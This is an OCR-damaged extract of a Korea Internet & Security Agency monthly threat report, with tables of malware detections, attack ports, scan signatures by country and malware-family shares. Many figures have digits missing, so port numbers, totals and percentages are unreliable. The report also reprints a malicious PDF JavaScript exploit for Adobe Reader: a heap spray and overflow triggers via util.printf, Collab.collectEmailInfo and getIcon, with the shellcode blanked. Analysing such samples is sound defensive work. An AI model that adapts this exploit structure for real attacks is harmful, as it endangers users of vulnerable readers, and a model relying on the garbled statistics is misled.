Korea Internet & Security Agency 21 3
[Figure/table residue: monthly Bot detection statistics (months 1 to 12) with monthly totals 932, 1,32, 1,85 and period shares; the remaining values cannot be assigned to labels.]
Top 10 detected malware, three reporting periods (period labels not recoverable):

Rank  Period 1                 Period 2                 Period 3
1     ONLINE GAME HACK  122    AGENT             135    ONLINE GAME HACK  149
2     AGENT             17     BREDOLAB          126    AGENT             18
3     MALWARE           75     AUTORUN           114    PALEVO            65
4     XEMA              52     PALEVO            75     AUTORUN           6
5     DOWNLOADER        44     MALWARE           61     FAKE AV           48
6     AUTORUN           39     ONLINE GAME HACK  56     DOWNLOADER        43
7     FAKE AV           24     DOWNLOADER        44     XEMA              41
8     BAGLE             23     FAKESYS           43     LMIRHACK          28
9     BREDOLAB          22     XEMA              39     MALWARE           27
10    INDUC             16     BIFROSE           36     DANOL             26
(unlabelled row)        48                       573                      49
Total                   932                      1,32                     1,85
[Table residue: a category table with row totals 21,23 / 898 / 1,76 / 1,53 / 3,27 and shares 51.4%, 2.2%, 3.6%, 42.8%; row labels not recoverable.]

Detections by operating system (five unlabelled columns, the last being the row total as printed):

OS             Col 1    Col 2  Col 3  Col 4  Col 5
Windows        14,174   492    633    667    1,792
Linux          4,4      238    257    188    683
Unix           49       17     1      2      29
(unlabelled)   2,166    151    176    196    523
Total          21,23    898    1,76   1,53   3,27
[Chart residue: share of attack traffic by port; legend entries 445, 139, 8, 125, 135 with shares 56.5%, 19.2%, 2.8% and 86%, 8.1%, 5.1%; pairing not recoverable.]

Attack ports and the vulnerabilities or malware associated with them (port numbers as printed):

Port    Associated vulnerability / malware
23      Cisco Telnet
2967    Symantec Exploit
8       WebDAV, ASN.1-HTTP, Cisco HTTP
2745    Bagle, Bagle2
135     DCOM, DCOM2
3127    MyDoom
139     NetBIOS, ASN.1-NT
314     Optix
143     IMail
5       UPNP
445     NetBIOS, LSASS, WksSvc, ASN.1-SMB, DCOM, RPC
611     Veritas Backup Exec
93      NetDevil
6129    Dameware
125     DCOM
173     Kuang2
1433    MS-SQL
27347   Sub7

1) http://www.microsoft.com/technet/security/current.aspx
2) http://www.boho.or.kr/pccheck/pcch_5.jsp?page_id=5
[Figure residue: daily IP counts, days 1 to 31, y-axis 5 to 3,5; values not recoverable.]
KISC - Korea Internet Security Center, KISA
Top attack sources by country and their most frequent signatures (percentages in the chart cannot be paired with entries):

China:  TCP/1433 tcp service scan; TCP/2967 tcp service scan; TCP/22 tcp service scan; TCP/888 tcp service scan
U.S.A:  TCP/445 netbios smb client to lsasrv request; TCP/2967 tcp service scan; ICMP icmp ping Nmap scan; TCP/22 tcp service scan
Canada: UDP/53 udp service scan; TCP/445 netbios smb client to lsasrv request; TCP/139 worm esbot.a
[Table residue: three top-10 signature rankings with percentages; the columns are interleaved and cannot be separated. Signatures listed: TCP/1433 tcp service scan; TCP/445 netbios smb client to lsasrv request; TCP/445 netbios lsass buffer overflow; TCP/2967 tcp service scan; TCP/22 tcp service scan; UDP/53 udp service scan; ICMP icmp ping; ICMP Advanced IP Scanner v1.4; ICMP X-scan scan; TCP/18, TCP/1521, TCP/336, TCP/88, TCP/8, TCP/1, TCP/89, TCP/888, TCP/889 tcp service scan; TCP/139 worm esbot.a.]
[Chart residue: shares 42.5%, 7.4%, 18.8%, 13.3%, 18%; legend: TCP/445 - netbios smb client to lsasrv request; TCP/1433 - tcp service scan; TCP/2967 - tcp service scan; UDP/53 - udp service scan.]
[Table residue: three top-10 signature rankings with percentages, columns interleaved. Signatures listed: TCP/135 tcp service scan; TCP/135 netbios dcerpc invalid bind; TCP/135 rpc dcom interface overflow exploit; TCP/4899 tcp service scan; TCP/4899 backdoor famous; UDP/1434 worm slammer; UDP/53 botnet ddns dns query; TCP/1433, TCP/189, TCP/22, TCP/3389, TCP/2967, TCP/1521, TCP/59 tcp service scan; TCP/139 microsoft windows pnp overflow exploit - suspicious zotob.]
[Chart residue: shares 35.4%, 1.5%, 15.3%, 21.3%, 17.5%; legend: TCP/4899 - tcp service scan; TCP/135 - netbios dcerpc invalid bind; UDP/1434 - worm slammer; TCP/189 - tcp service scan.]
[Chart residue: daily traffic by port, days 1 to 31; legend: TCP/8, UDP/9155, TCP/88, TCP/25, UDP/53, TCP/51, TCP/24, TCP/9153, UDP/443, TCP/54.]
[Chart residue: daily attack counts by type, days 1 to 31; legend: TCP SYN Flooding (DDoS), Host Sweep, UDP Tear Drop, TCP ACK Flooding, UDP Flooding, TCP Connect DOS, Ping Sweep, HTTP Login B, SMB Service sweep (tcp-445), Malicious Data (Etc Packet).]
Top 10 malware families by share, three reporting periods (period labels not recoverable; values as printed):

Rank  Period 1            Period 2            Period 3
1     PWS         14.5%   PWS         16.3%   PWS         16.7%
2     HLLW        13.2%   HLLW        12.7%   HLLW        16%
3     GENERIC     9.8%    GENERIC     8.8%    GENERIC     1.9%
4     VIRUT       7.4%    BREDLAB     8.4%    HLLM        7.1%
5     HLLM        6.9%    HLLM        6.5%    VIRUT       6.2%
6     DOWNLOADER  5.8%    PARITE      6.2%    PARITE      4.2%
7     PARITE      5.8%    VIRUT       5.6%    NSANTI      2.9%
8     NSANTI      2.5%    DOWNLOADER  4%      ACADAP      2.8%
9     PESTUB      1.9%    POLIPOS     3.2%    DOWNLOADER  2.6%
10    MULDROP     1.8%    ACADAP      2.2%    PESTUB      2.3%
(unlabelled row)  3.4%               26.1%               28.3%
(unlabelled row)  1%                 1%                  1%
Malicious PDF JavaScript sample (as reproduced in the report; payload strings are blanked and several numeric constants are printed with digits missing, so the listing is for analysis, not execution):

```javascript
// Selects one of three Adobe Reader attack paths by viewer version.
// Detection note: the combination of app.viewerVersion checks, large
// unescape()'d strings, util.printf with an oversized width, and calls to
// Collab.collectEmailInfo / Collab.getIcon is what PDF JavaScript
// scanners key on.
var arry = new Array();

// Pads a string by doubling until it reaches len, then trims to len / 2.
function fix_it(yarsp, len) {
  while (yarsp.length * 2 < len) {
    yarsp += yarsp;
  }
  // "0" restored: the listing drops the digit, but a start index is required.
  yarsp = yarsp.substring(0, len / 2);
  return yarsp;
}

var version = app.viewerversion;

if (version > 8) {
  // Heap spray: many copies of a NOP sled followed by the payload.
  var payload = unescape(" ");           // shellcode blanked in the listing
  nop = unescape("%uaa%uaa%uaa%uaa");    // sled bytes as printed
  heapblock = nop + payload;
  bigblock = unescape("%uaa%uaa");
  headersize = 2;                        // as printed
  spray = headersize + heapblock.length;
  while (bigblock.length < spray) bigblock += bigblock;
  fillblock = bigblock.substring(0, spray);
  block = bigblock.substring(0, bigblock.length - spray);
  while (block.length + spray < x4) block = block + block + fillblock;  // size bound as printed
  mem = new Array();
  for (i = 0; i < 14; i++) mem[i] = block + heapblock;  // loop bound as printed
  var num = ;                            // numeric argument elided in the listing
  // Trigger: util.printf with an oversized field width.
  util.printf("%45f", num);
}

if (version < 8) {
  var addkk = unescape(" ");             // blanked in the listing
  // Trigger: Collab.collectEmailInfo with an oversized msg argument.
  // "overflow" is not defined anywhere in the excerpt.
  this.collabstore = Collab.collectEmailInfo({ subj: "", msg: overflow });
}

if (version < 9.1) {
  if (app.doc.collab.geticon) {
    var vvpethya = unescape(" ");        // blanked in the listing
    // Trigger: Collab.getIcon with an oversized argument.
    // "tumhnbgw" is not defined anywhere in the excerpt.
    app.doc.collab.geticon(tumhnbgw);
  }
}
```
[Figure residue: monitored ports 22, 8, 135, 139, 445, 125, 18, 1433, 1434, 2745, 341, 4899, 5, 6129, 88 (as printed); per-port values not recoverable.]
Glossary terms:
Trojan
Phishing
ASP.NET
Botnet
DHTML Editing Component ActiveX
E-mail
Hyperlink
KrCERT/CC
LLS
NetBIOS
OLE/COM
PNG
SMB
TCP Syn Flooding
Windows SharePoint Services
Windows Shell